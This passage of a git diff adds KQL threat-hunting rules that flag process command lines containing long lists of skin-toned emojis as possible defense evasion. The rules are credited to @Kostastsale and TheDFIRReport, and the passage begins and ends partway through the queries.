or ProcessCommandLine contains "👨🏻‍🍼" or ProcessCommandLine contains "🙇🏻‍♀️" or ProcessCommandLine contains "🙇🏻" or ProcessCommandLine contains "🙇🏻‍♂️" or ProcessCommandLine contains "💁🏻‍♀️" or ProcessCommandLine contains "💁🏻" or ProcessCommandLine contains "💁🏻‍♂️" or ProcessCommandLine contains "🙅🏻‍♀️" or ProcessCommandLine contains "🙅🏻" or ProcessCommandLine contains "🙅🏻‍♂️" or ProcessCommandLine contains "🙆🏻‍♀️" or ProcessCommandLine contains "🙆🏻" or ProcessCommandLine contains "🙆🏻‍♂️" or ProcessCommandLine contains "🙋🏻‍♀️" or ProcessCommandLine contains "🙋🏻" or ProcessCommandLine contains "🙋🏻‍♂️" or ProcessCommandLine contains "🧏🏻‍♀️" or ProcessCommandLine contains "🧏🏻" or ProcessCommandLine contains "🧏🏻‍♂️" or ProcessCommandLine contains "🤦🏻‍♀️" or ProcessCommandLine contains "🤦🏻" or ProcessCommandLine contains "🤦🏻‍♂️" or ProcessCommandLine contains "🤷🏻‍♀️" or ProcessCommandLine contains "🤷🏻" or ProcessCommandLine contains "🤷🏻‍♂️" or ProcessCommandLine contains "🙎🏻‍♀️" or ProcessCommandLine contains "🙎🏻" or ProcessCommandLine contains "🙎🏻‍♂️" or ProcessCommandLine contains "🙍🏻‍♀️" or ProcessCommandLine contains "🙍🏻" or ProcessCommandLine contains "🙍🏻‍♂️" or ProcessCommandLine contains "💇🏻‍♀️" or ProcessCommandLine contains "💇🏻" or ProcessCommandLine contains "💇🏻‍♂️" or ProcessCommandLine contains "💆🏻‍♀️" or ProcessCommandLine contains "💆🏻" or ProcessCommandLine contains "💆🏻‍♂️" or ProcessCommandLine contains "🧖🏻‍♀️" or ProcessCommandLine contains "🧖🏻" or ProcessCommandLine contains "🧖🏻‍♂️" or ProcessCommandLine contains "💃🏻" or ProcessCommandLine contains "🕺🏻" or ProcessCommandLine contains "🕴🏻" or ProcessCommandLine contains "👩🏻‍🦽" or ProcessCommandLine contains "🧑🏻‍🦽" or ProcessCommandLine contains "👨🏻‍🦽" or ProcessCommandLine contains "👩🏻‍🦼" or ProcessCommandLine contains "🧑🏻‍🦼" or ProcessCommandLine contains "👨🏻‍🦼" or ProcessCommandLine contains "🚶🏻‍♀️" or ProcessCommandLine contains "🚶🏻" or ProcessCommandLine contains "🚶🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦯" or ProcessCommandLine contains "🧑🏻‍🦯" or ProcessCommandLine contains "👨🏻‍🦯" or ProcessCommandLine contains "🧎🏻‍♀️" or ProcessCommandLine contains "🧎🏻" or ProcessCommandLine contains "🧎🏻‍♂️" or ProcessCommandLine contains "🏃🏻‍♀️" or ProcessCommandLine contains "🏃🏻" or ProcessCommandLine contains "🏃🏻‍♂️" or ProcessCommandLine contains "🧍🏻‍♀️" or ProcessCommandLine contains "🧍🏻" or ProcessCommandLine contains "🧍🏻‍♂️" or ProcessCommandLine contains "👭🏻" or ProcessCommandLine contains "🧑🏻‍🤝‍🧑🏻" or ProcessCommandLine contains "👬🏻" or ProcessCommandLine contains "👫🏻" or ProcessCommandLine contains "🧗🏻‍♀️" or ProcessCommandLine contains "🧗🏻" or ProcessCommandLine contains "🧗🏻‍♂️" or ProcessCommandLine contains "🏇🏻" or ProcessCommandLine contains "🏂🏻" or ProcessCommandLine contains "🏌🏻‍♀️" or ProcessCommandLine contains "🏌🏻" or ProcessCommandLine contains "🏌🏻‍♂️" or ProcessCommandLine contains "🏄🏻‍♀️" or ProcessCommandLine contains "🏄🏻" or ProcessCommandLine contains "🏄🏻‍♂️" or ProcessCommandLine contains "🚣🏻‍♀️" or ProcessCommandLine contains "🚣🏻" or ProcessCommandLine contains "🚣🏻‍♂️" or ProcessCommandLine contains "🏊🏻‍♀️" or ProcessCommandLine contains "🏊🏻" or ProcessCommandLine contains "🏊🏻‍♂️" or ProcessCommandLine contains "⛹🏻‍♀️" or ProcessCommandLine contains "⛹🏻" or ProcessCommandLine contains "⛹🏻‍♂️" or ProcessCommandLine contains "🏋🏻‍♀️" or ProcessCommandLine contains "🏋🏻" or ProcessCommandLine contains "🏋🏻‍♂️" or ProcessCommandLine contains "🚴🏻‍♀️" or ProcessCommandLine contains "🚴🏻" or ProcessCommandLine contains "🚴🏻‍♂️" or ProcessCommandLine contains "🚵🏻‍♀️" or ProcessCommandLine contains "🚵🏻" or ProcessCommandLine contains "🚵🏻‍♂️" or ProcessCommandLine contains "🤸🏻‍♀️" or ProcessCommandLine contains "🤸🏻" or ProcessCommandLine contains "🤸🏻‍♂️" or ProcessCommandLine contains "🤽🏻‍♀️" or ProcessCommandLine contains "🤽🏻" or ProcessCommandLine contains "🤽🏻‍♂️" or ProcessCommandLine contains "🤾🏻‍♀️" or ProcessCommandLine contains "🤾🏻" or ProcessCommandLine contains "🤾🏻‍♂️" or ProcessCommandLine contains "🤹🏻‍♀️" or ProcessCommandLine contains "🤹🏻" or ProcessCommandLine contains "🤹🏻‍♂️" or ProcessCommandLine contains "🧘🏻‍♀️" or ProcessCommandLine contains "🧘🏻" or ProcessCommandLine contains "🧘🏻‍♂️" or ProcessCommandLine contains "🛀🏻" or ProcessCommandLine contains "🛌🏻" or ProcessCommandLine contains "👋🏼" or ProcessCommandLine contains "🤚🏼" or ProcessCommandLine contains "🖐🏼" or ProcessCommandLine contains "✋🏼" or ProcessCommandLine contains "🖖🏼" or ProcessCommandLine contains "👌🏼" or ProcessCommandLine contains "🤌🏼" or ProcessCommandLine contains "🤏🏼" or ProcessCommandLine contains "✌🏼" or ProcessCommandLine contains "🤞🏼" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🤟🏼" or ProcessCommandLine contains "🤘🏼" or ProcessCommandLine contains "🤙🏼" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "👈🏼" or ProcessCommandLine contains "👉🏼" or ProcessCommandLine contains "👆🏼" or ProcessCommandLine contains "🖕🏼" or ProcessCommandLine contains "👇🏼" or ProcessCommandLine contains "☝🏼" or ProcessCommandLine contains "👍🏼" or ProcessCommandLine contains "👎🏼" or ProcessCommandLine contains "✊🏼" or ProcessCommandLine contains "👊🏼" or ProcessCommandLine contains "🤛🏼" or ProcessCommandLine contains "🤜🏼" or ProcessCommandLine contains "👏🏼" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🙌🏼" or ProcessCommandLine contains "👐🏼" or ProcessCommandLine contains "🤲🏼" or ProcessCommandLine contains "🙏🏼" or ProcessCommandLine contains "✍🏼" or ProcessCommandLine contains "💪🏼" or ProcessCommandLine contains "🦵🏼" or ProcessCommandLine contains "🦶🏼" or ProcessCommandLine contains "👂🏼" or ProcessCommandLine contains "🦻🏼" or ProcessCommandLine contains "👃🏼" or ProcessCommandLine contains "👶🏼" or ProcessCommandLine contains "👧🏼" or ProcessCommandLine contains "🧒🏼" or ProcessCommandLine contains "👦🏼" or ProcessCommandLine contains "👩🏼" or ProcessCommandLine contains "🧑🏼" or ProcessCommandLine contains "👨🏼" or ProcessCommandLine contains "👩🏼‍🦱" or ProcessCommandLine contains "🧑🏼‍🦱" or ProcessCommandLine contains "👨🏼‍🦱" or ProcessCommandLine contains "👩🏼‍🦰" or ProcessCommandLine contains "🧑🏼‍🦰" or ProcessCommandLine contains "👨🏼‍🦰" or ProcessCommandLine contains "👱🏼‍♀️" or ProcessCommandLine contains "👱🏼" or ProcessCommandLine contains "👱🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦳" or ProcessCommandLine contains "🧑🏼‍🦳" or ProcessCommandLine contains "👨🏼‍🦳" or ProcessCommandLine contains "👩🏼‍🦲" or ProcessCommandLine contains "🧑🏼‍🦲" or ProcessCommandLine contains "👨🏼‍🦲" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏼" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "👵🏼" or ProcessCommandLine contains "🧓🏼" or ProcessCommandLine contains "👴🏼" or ProcessCommandLine contains "👲🏼" or ProcessCommandLine contains "👳🏼‍♀️" or ProcessCommandLine contains "👳🏼" or ProcessCommandLine contains "👳🏼‍♂️" or ProcessCommandLine contains "🧕🏼" or ProcessCommandLine contains "👮🏼‍♀️" or ProcessCommandLine contains "👮🏼" or ProcessCommandLine contains "👮🏼‍♂️" or ProcessCommandLine contains "👷🏼‍♀️" or ProcessCommandLine contains "👷🏼" or ProcessCommandLine contains "👷🏼‍♂️" or ProcessCommandLine contains "💂🏼‍♀️" or ProcessCommandLine contains "💂🏼" or ProcessCommandLine contains "💂🏼‍♂️" or ProcessCommandLine contains "🕵🏼‍♀️" or ProcessCommandLine contains "🕵🏼" or ProcessCommandLine contains "🕵🏼‍♂️" or ProcessCommandLine contains "👩🏼‍⚕️" or ProcessCommandLine contains "🧑🏼‍⚕️" or ProcessCommandLine contains "👨🏼‍⚕️" or ProcessCommandLine contains "👩🏼‍🌾" or ProcessCommandLine contains "🧑🏼‍🌾" or ProcessCommandLine contains "👨🏼‍🌾" or ProcessCommandLine contains "👩🏼‍🍳" or ProcessCommandLine contains "🧑🏼‍🍳" or ProcessCommandLine contains "👨🏼‍🍳" or ProcessCommandLine contains "👩🏼‍🎓" or ProcessCommandLine contains "🧑🏼‍🎓" or ProcessCommandLine contains "👨🏼‍🎓" or ProcessCommandLine contains "👩🏼‍🎤" or ProcessCommandLine contains "🧑🏼‍🎤" or ProcessCommandLine contains "👨🏼‍🎤" or ProcessCommandLine contains "👩🏼‍🏫" or ProcessCommandLine contains "🧑🏼‍🏫" or ProcessCommandLine contains "👨🏼‍🏫" or ProcessCommandLine contains "👩🏼‍🏭" or ProcessCommandLine contains "🧑🏼‍🏭" or ProcessCommandLine contains "👨🏼‍🏭" or ProcessCommandLine contains "👩🏼‍💻" or ProcessCommandLine contains "🧑🏼‍💻" or ProcessCommandLine contains "👨🏼‍💻" or ProcessCommandLine contains "👩🏼‍💼" or ProcessCommandLine contains "🧑🏼‍💼" or ProcessCommandLine contains "👨🏼‍💼" or ProcessCommandLine contains "👩🏼‍🔧" or ProcessCommandLine contains "🧑🏼‍🔧" or ProcessCommandLine contains "👨🏼‍🔧" or ProcessCommandLine contains "👩🏼‍🔬" or ProcessCommandLine contains "🧑🏼‍🔬" or ProcessCommandLine contains "👨🏼‍🔬" or ProcessCommandLine contains "👩🏼‍🎨" or ProcessCommandLine contains "🧑🏼‍🎨" or ProcessCommandLine contains "👨🏼‍🎨" or ProcessCommandLine contains "👩🏼‍🚒" or ProcessCommandLine contains "🧑🏼‍🚒" or ProcessCommandLine contains "👨🏼‍🚒" or ProcessCommandLine contains "👩🏼‍✈️" or ProcessCommandLine contains "🧑🏼‍✈️" or ProcessCommandLine contains "👨🏼‍✈️" or ProcessCommandLine contains "👩🏼‍🚀" or ProcessCommandLine contains "🧑🏼‍🚀" or ProcessCommandLine contains "👨🏼‍🚀" or ProcessCommandLine contains "👩🏼‍⚖️" or ProcessCommandLine contains "🧑🏼‍⚖️" or ProcessCommandLine contains "👨🏼‍⚖️" or ProcessCommandLine contains "👰🏼‍♀️" or ProcessCommandLine contains "👰🏼" or ProcessCommandLine contains "👰🏼‍♂️" or ProcessCommandLine contains "🤵🏼‍♀️" or ProcessCommandLine contains "🤵🏼" or ProcessCommandLine contains "🤵🏼‍♂️" or ProcessCommandLine contains "👸🏼" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🤴🏼" or ProcessCommandLine contains "🥷🏼" or ProcessCommandLine contains "🦸🏼‍♀️" or ProcessCommandLine contains "🦸🏼" or ProcessCommandLine contains "🦸🏼‍♂️" or ProcessCommandLine contains "🦹🏼‍♀️" or ProcessCommandLine contains "🦹🏼" or ProcessCommandLine contains "🦹🏼‍♂️" or ProcessCommandLine contains "🤶🏼" or ProcessCommandLine contains "🧑🏼‍🎄" or ProcessCommandLine contains "🎅🏼" or ProcessCommandLine contains "🧙🏼‍♀️" or ProcessCommandLine contains "🧙🏼" or ProcessCommandLine contains "🧙🏼‍♂️" or ProcessCommandLine contains "🧝🏼‍♀️" or ProcessCommandLine contains "🧝🏼" or ProcessCommandLine contains "🧝🏼‍♂️" or ProcessCommandLine contains "🧛🏼‍♀️" or ProcessCommandLine contains "🧛🏼" or ProcessCommandLine contains "🧛🏼‍♂️" or ProcessCommandLine contains "🧜🏼‍♀️" or ProcessCommandLine contains "🧜🏼" or ProcessCommandLine contains "🧜🏼‍♂️" or ProcessCommandLine contains "🧚🏼‍♀️" or ProcessCommandLine contains "🧚🏼" or ProcessCommandLine contains "🧚🏼‍♂️" or ProcessCommandLine contains "👼🏼" or ProcessCommandLine contains "🤰🏼" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🤱🏼" or ProcessCommandLine contains "👩🏼‍🍼" or ProcessCommandLine contains "🧑🏼‍🍼" or ProcessCommandLine contains "👨🏼‍🍼" or ProcessCommandLine contains "🙇🏼‍♀️" or ProcessCommandLine contains "🙇🏼" or ProcessCommandLine contains "🙇🏼‍♂️" or ProcessCommandLine contains "💁🏼‍♀️" or ProcessCommandLine contains "💁🏼" or ProcessCommandLine contains "💁🏼‍♂️" or ProcessCommandLine contains "🙅🏼‍♀️" or ProcessCommandLine contains "🙅🏼" or ProcessCommandLine contains "🙅🏼‍♂️" or ProcessCommandLine contains "🙆🏼‍♀️" or ProcessCommandLine contains "🙆🏼" or ProcessCommandLine contains "🙆🏼‍♂️" or ProcessCommandLine contains "🙋🏼‍♀️" or ProcessCommandLine contains "🙋🏼" or ProcessCommandLine contains "🙋🏼‍♂️" or ProcessCommandLine contains "🧏🏼‍♀️" or ProcessCommandLine contains "🧏🏼" or ProcessCommandLine contains "🧏🏼‍♂️" or ProcessCommandLine contains "🤦🏼‍♀️" or ProcessCommandLine contains "🤦🏼" or ProcessCommandLine contains "🤦🏼‍♂️" or ProcessCommandLine contains "🤷🏼‍♀️" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql new file mode 100644 index 00000000..2fee1173 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql @@ -0,0 +1,10 @@ +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "🤷🏼" or ProcessCommandLine contains "🤷🏼‍♂️" or ProcessCommandLine contains "🙎🏼‍♀️" or ProcessCommandLine contains "🙎🏼" or ProcessCommandLine contains "🙎🏼‍♂️" or ProcessCommandLine contains "🙍🏼‍♀️" or ProcessCommandLine contains "🙍🏼" or ProcessCommandLine contains "🙍🏼‍♂️" or ProcessCommandLine contains "💇🏼‍♀️" or ProcessCommandLine contains "💇🏼" or ProcessCommandLine contains "💇🏼‍♂️" or ProcessCommandLine contains "💆🏼‍♀️" or ProcessCommandLine contains "💆🏼" or ProcessCommandLine contains "💆🏼‍♂️" or ProcessCommandLine contains "🧖🏼‍♀️" or ProcessCommandLine contains "🧖🏼" or ProcessCommandLine contains "🧖🏼‍♂️" or ProcessCommandLine contains "💃🏼" or ProcessCommandLine contains "🕺🏼" or ProcessCommandLine contains "🕴🏼" or ProcessCommandLine contains "👩🏼‍🦽" or ProcessCommandLine contains "🧑🏼‍🦽" or ProcessCommandLine contains "👨🏼‍🦽" or ProcessCommandLine contains "👩🏼‍🦼" or ProcessCommandLine contains "🧑🏼‍🦼" or ProcessCommandLine contains "👨🏼‍🦼" or ProcessCommandLine contains "🚶🏼‍♀️" or ProcessCommandLine contains "🚶🏼" or ProcessCommandLine contains "🚶🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦯" or ProcessCommandLine contains "🧑🏼‍🦯" or ProcessCommandLine contains "👨🏼‍🦯" or ProcessCommandLine contains "🧎🏼‍♀️" or ProcessCommandLine contains "🧎🏼" or ProcessCommandLine contains "🧎🏼‍♂️" or ProcessCommandLine contains "🏃🏼‍♀️" or ProcessCommandLine contains "🏃🏼" or ProcessCommandLine contains "🏃🏼‍♂️" or ProcessCommandLine contains "🧍🏼‍♀️" or ProcessCommandLine contains "🧍🏼" or ProcessCommandLine contains "🧍🏼‍♂️" or ProcessCommandLine contains "👭🏼" or ProcessCommandLine contains "🧑🏼‍🤝‍🧑🏼" or ProcessCommandLine contains "👬🏼" or ProcessCommandLine contains "👫🏼" or ProcessCommandLine contains "🧗🏼‍♀️" or ProcessCommandLine contains "🧗🏼" or ProcessCommandLine contains "🧗🏼‍♂️" or ProcessCommandLine contains "🏇🏼" or ProcessCommandLine contains "🏂🏼" or ProcessCommandLine contains "🏌🏼‍♀️" or ProcessCommandLine contains "🏌🏼" or ProcessCommandLine contains "🏌🏼‍♂️" or ProcessCommandLine contains "🏄🏼‍♀️" or ProcessCommandLine contains "🏄🏼" or ProcessCommandLine contains "🏄🏼‍♂️" or ProcessCommandLine contains "🚣🏼‍♀️" or ProcessCommandLine contains "🚣🏼" or ProcessCommandLine contains "🚣🏼‍♂️" or ProcessCommandLine contains "🏊🏼‍♀️" or ProcessCommandLine contains "🏊🏼" or ProcessCommandLine contains "🏊🏼‍♂️" or ProcessCommandLine contains "⛹🏼‍♀️" or ProcessCommandLine contains "⛹🏼" or ProcessCommandLine contains "⛹🏼‍♂️" or ProcessCommandLine contains "🏋🏼‍♀️" or ProcessCommandLine contains "🏋🏼" or ProcessCommandLine contains "🏋🏼‍♂️" or ProcessCommandLine contains "🚴🏼‍♀️" or ProcessCommandLine contains "🚴🏼" or ProcessCommandLine contains "🚴🏼‍♂️" or ProcessCommandLine contains "🚵🏼‍♀️" or ProcessCommandLine contains "🚵🏼" or ProcessCommandLine contains "🚵🏼‍♂️" or ProcessCommandLine contains "🤸🏼‍♀️" or ProcessCommandLine contains "🤸🏼" or ProcessCommandLine contains "🤸🏼‍♂️" or ProcessCommandLine contains "🤽🏼‍♀️" or ProcessCommandLine contains "🤽🏼" or ProcessCommandLine contains "🤽🏼‍♂️" or ProcessCommandLine contains "🤾🏼‍♀️" or ProcessCommandLine contains "🤾🏼" or ProcessCommandLine contains "🤾🏼‍♂️" or ProcessCommandLine contains "🤹🏼‍♀️" or ProcessCommandLine contains "🤹🏼" or ProcessCommandLine contains "🤹🏼‍♂️" or ProcessCommandLine contains "🧘🏼‍♀️" or ProcessCommandLine contains "🧘🏼" or ProcessCommandLine contains "🧘🏼‍♂️" or ProcessCommandLine contains "🛀🏼" or ProcessCommandLine contains "🛌🏼" or ProcessCommandLine contains "👋🏽" or ProcessCommandLine contains "🤚🏽" or ProcessCommandLine contains "🖐🏽" or ProcessCommandLine contains "✋🏽" or ProcessCommandLine contains "🖖🏽" or ProcessCommandLine contains "👌🏽" or ProcessCommandLine contains "🤌🏽" or ProcessCommandLine contains "🤏🏽" or ProcessCommandLine contains "✌🏽" or ProcessCommandLine contains "🤞🏽" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🤟🏽" or ProcessCommandLine contains "🤘🏽" or ProcessCommandLine contains "🤙🏽" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "👈🏽" or ProcessCommandLine contains "👉🏽" or ProcessCommandLine contains "👆🏽" or ProcessCommandLine contains "🖕🏽" or ProcessCommandLine contains "👇🏽" or ProcessCommandLine contains "☝🏽" or ProcessCommandLine contains "👍🏽" or ProcessCommandLine contains "👎🏽" or ProcessCommandLine contains "✊🏽" or ProcessCommandLine contains "👊🏽" or ProcessCommandLine contains "🤛🏽" or ProcessCommandLine contains "🤜🏽" or ProcessCommandLine contains "👏🏽" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🙌🏽" or ProcessCommandLine contains "👐🏽" or ProcessCommandLine contains "🤲🏽" or ProcessCommandLine contains "🙏🏽" or ProcessCommandLine contains "✍🏽" or ProcessCommandLine contains "💪🏽" or ProcessCommandLine contains "🦵🏽" or ProcessCommandLine contains "🦶🏽" or ProcessCommandLine contains "👂🏽" or ProcessCommandLine contains "🦻🏽" or ProcessCommandLine contains "👃🏽" or ProcessCommandLine contains "👶🏽" or ProcessCommandLine contains "👧🏽" or ProcessCommandLine contains "🧒🏽" or ProcessCommandLine contains "👦🏽" or ProcessCommandLine contains "👩🏽" or ProcessCommandLine contains "🧑🏽" or ProcessCommandLine contains "👨🏽" or ProcessCommandLine contains "👩🏽‍🦱" or ProcessCommandLine contains "🧑🏽‍🦱" or ProcessCommandLine contains "👨🏽‍🦱" or ProcessCommandLine contains "👩🏽‍🦰" or ProcessCommandLine contains "🧑🏽‍🦰" or ProcessCommandLine contains "👨🏽‍🦰" or ProcessCommandLine contains "👱🏽‍♀️" or ProcessCommandLine contains "👱🏽" or ProcessCommandLine contains "👱🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦳" or ProcessCommandLine contains "🧑🏽‍🦳" or ProcessCommandLine contains "👨🏽‍🦳" or ProcessCommandLine contains "👩🏽‍🦲" or ProcessCommandLine contains "🧑🏽‍🦲" or ProcessCommandLine contains "👨🏽‍🦲" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏽" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "👵🏽" or ProcessCommandLine contains "🧓🏽" or ProcessCommandLine contains "👴🏽" or ProcessCommandLine contains "👲🏽" or ProcessCommandLine contains "👳🏽‍♀️" or ProcessCommandLine contains "👳🏽" or ProcessCommandLine contains "👳🏽‍♂️" or ProcessCommandLine contains "🧕🏽" or ProcessCommandLine contains "👮🏽‍♀️" or ProcessCommandLine contains "👮🏽" or ProcessCommandLine contains "👮🏽‍♂️" or ProcessCommandLine contains "👷🏽‍♀️" or ProcessCommandLine contains "👷🏽" or ProcessCommandLine contains "👷🏽‍♂️" or ProcessCommandLine contains "💂🏽‍♀️" or ProcessCommandLine contains "💂🏽" or ProcessCommandLine contains "💂🏽‍♂️" or ProcessCommandLine contains "🕵🏽‍♀️" or ProcessCommandLine contains "🕵🏽" or ProcessCommandLine contains "🕵🏽‍♂️" or ProcessCommandLine contains "👩🏽‍⚕️" or ProcessCommandLine contains "🧑🏽‍⚕️" or ProcessCommandLine contains "👨🏽‍⚕️" or ProcessCommandLine contains "👩🏽‍🌾" or ProcessCommandLine contains "🧑🏽‍🌾" or ProcessCommandLine contains "👨🏽‍🌾" or ProcessCommandLine contains "👩🏽‍🍳" or ProcessCommandLine contains "🧑🏽‍🍳" or ProcessCommandLine contains "👨🏽‍🍳" or ProcessCommandLine contains "👩🏽‍🎓" or ProcessCommandLine contains "🧑🏽‍🎓" or ProcessCommandLine contains "👨🏽‍🎓" or ProcessCommandLine contains "👩🏽‍🎤" or ProcessCommandLine contains "🧑🏽‍🎤" or ProcessCommandLine contains "👨🏽‍🎤" or ProcessCommandLine contains "👩🏽‍🏫" or ProcessCommandLine contains "🧑🏽‍🏫" or ProcessCommandLine contains "👨🏽‍🏫" or ProcessCommandLine contains "👩🏽‍🏭" or ProcessCommandLine contains "🧑🏽‍🏭" or ProcessCommandLine contains "👨🏽‍🏭" or ProcessCommandLine contains "👩🏽‍💻" or ProcessCommandLine contains "🧑🏽‍💻" or ProcessCommandLine contains "👨🏽‍💻" or ProcessCommandLine contains "👩🏽‍💼" or ProcessCommandLine contains "🧑🏽‍💼" or ProcessCommandLine contains "👨🏽‍💼" or ProcessCommandLine contains "👩🏽‍🔧" or ProcessCommandLine contains "🧑🏽‍🔧" or ProcessCommandLine contains "👨🏽‍🔧" or ProcessCommandLine contains "👩🏽‍🔬" or ProcessCommandLine contains "🧑🏽‍🔬" or ProcessCommandLine contains "👨🏽‍🔬" or ProcessCommandLine contains "👩🏽‍🎨" or ProcessCommandLine contains "🧑🏽‍🎨" or ProcessCommandLine contains "👨🏽‍🎨" or ProcessCommandLine contains "👩🏽‍🚒" or ProcessCommandLine contains "🧑🏽‍🚒" or ProcessCommandLine contains "👨🏽‍🚒" or ProcessCommandLine contains "👩🏽‍✈️" or ProcessCommandLine contains "🧑🏽‍✈️" or ProcessCommandLine contains "👨🏽‍✈️" or ProcessCommandLine contains "👩🏽‍🚀" or ProcessCommandLine contains "🧑🏽‍🚀" or ProcessCommandLine contains "👨🏽‍🚀" or ProcessCommandLine contains "👩🏽‍⚖️" or ProcessCommandLine contains "🧑🏽‍⚖️" or ProcessCommandLine contains "👨🏽‍⚖️" or ProcessCommandLine contains "👰🏽‍♀️" or ProcessCommandLine contains "👰🏽" or ProcessCommandLine contains "👰🏽‍♂️" or ProcessCommandLine contains "🤵🏽‍♀️" or ProcessCommandLine contains "🤵🏽" or ProcessCommandLine contains "🤵🏽‍♂️" or ProcessCommandLine contains "👸🏽" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🤴🏽" or ProcessCommandLine contains "🥷🏽" or ProcessCommandLine contains "🦸🏽‍♀️" or ProcessCommandLine contains "🦸🏽" or ProcessCommandLine contains "🦸🏽‍♂️" or ProcessCommandLine contains "🦹🏽‍♀️" or ProcessCommandLine contains "🦹🏽" or ProcessCommandLine contains "🦹🏽‍♂️" or ProcessCommandLine contains "🤶🏽" or ProcessCommandLine contains "🧑🏽‍🎄" or ProcessCommandLine contains "🎅🏽" or ProcessCommandLine contains "🧙🏽‍♀️" or ProcessCommandLine contains "🧙🏽" or ProcessCommandLine contains "🧙🏽‍♂️" or ProcessCommandLine contains "🧝🏽‍♀️" or ProcessCommandLine contains "🧝🏽" or ProcessCommandLine contains "🧝🏽‍♂️" or ProcessCommandLine contains "🧛🏽‍♀️" or ProcessCommandLine contains "🧛🏽" or ProcessCommandLine contains "🧛🏽‍♂️" or ProcessCommandLine contains "🧜🏽‍♀️" or ProcessCommandLine contains "🧜🏽" or ProcessCommandLine contains "🧜🏽‍♂️" or ProcessCommandLine contains "🧚🏽‍♀️" or ProcessCommandLine contains "🧚🏽" or ProcessCommandLine contains "🧚🏽‍♂️" or ProcessCommandLine contains "👼🏽" or ProcessCommandLine contains "🤰🏽" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🤱🏽" or ProcessCommandLine contains "👩🏽‍🍼" or ProcessCommandLine contains "🧑🏽‍🍼" or ProcessCommandLine contains "👨🏽‍🍼" or ProcessCommandLine contains "🙇🏽‍♀️" or ProcessCommandLine contains "🙇🏽" or ProcessCommandLine contains "🙇🏽‍♂️" or ProcessCommandLine contains "💁🏽‍♀️" or ProcessCommandLine contains "💁🏽" or ProcessCommandLine contains "💁🏽‍♂️" or ProcessCommandLine contains "🙅🏽‍♀️" or ProcessCommandLine contains "🙅🏽" or ProcessCommandLine contains "🙅🏽‍♂️" or ProcessCommandLine contains "🙆🏽‍♀️" or ProcessCommandLine contains "🙆🏽" or ProcessCommandLine contains "🙆🏽‍♂️" or ProcessCommandLine contains "🙋🏽‍♀️" or ProcessCommandLine contains "🙋🏽" or ProcessCommandLine contains "🙋🏽‍♂️" or ProcessCommandLine contains "🧏🏽‍♀️" or ProcessCommandLine contains "🧏🏽" or ProcessCommandLine contains "🧏🏽‍♂️" or ProcessCommandLine contains "🤦🏽‍♀️" or ProcessCommandLine contains "🤦🏽" or ProcessCommandLine contains "🤦🏽‍♂️" or ProcessCommandLine contains "🤷🏽‍♀️" or ProcessCommandLine contains "🤷🏽" or ProcessCommandLine contains "🤷🏽‍♂️" or ProcessCommandLine contains "🙎🏽‍♀️" or ProcessCommandLine contains "🙎🏽" or ProcessCommandLine contains "🙎🏽‍♂️" or ProcessCommandLine contains "🙍🏽‍♀️" or ProcessCommandLine contains "🙍🏽" or ProcessCommandLine contains "🙍🏽‍♂️" or ProcessCommandLine contains "💇🏽‍♀️" or ProcessCommandLine contains "💇🏽" or ProcessCommandLine contains "💇🏽‍♂️" or ProcessCommandLine contains "💆🏽‍♀️" or ProcessCommandLine contains "💆🏽" or ProcessCommandLine contains "💆🏽‍♂️" or ProcessCommandLine contains "🧖🏽‍♀️" or ProcessCommandLine contains "🧖🏽" or ProcessCommandLine contains "🧖🏽‍♂️" or ProcessCommandLine contains "💃🏽" or ProcessCommandLine contains "🕺🏽" or ProcessCommandLine contains "🕴🏽" or ProcessCommandLine contains "👩🏽‍🦽" or ProcessCommandLine contains "🧑🏽‍🦽" or ProcessCommandLine contains "👨🏽‍🦽" or ProcessCommandLine contains "👩🏽‍🦼" or ProcessCommandLine contains "🧑🏽‍🦼" or ProcessCommandLine contains "👨🏽‍🦼" or ProcessCommandLine contains "🚶🏽‍♀️" or ProcessCommandLine contains "🚶🏽" or ProcessCommandLine contains "🚶🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦯" or ProcessCommandLine contains "🧑🏽‍🦯" or ProcessCommandLine contains "👨🏽‍🦯" or ProcessCommandLine contains "🧎🏽‍♀️" or ProcessCommandLine contains "🧎🏽" or ProcessCommandLine contains "🧎🏽‍♂️" or ProcessCommandLine contains "🏃🏽‍♀️" or ProcessCommandLine contains "🏃🏽" or ProcessCommandLine contains "🏃🏽‍♂️" or ProcessCommandLine contains "🧍🏽‍♀️" or ProcessCommandLine contains "🧍🏽" or ProcessCommandLine contains 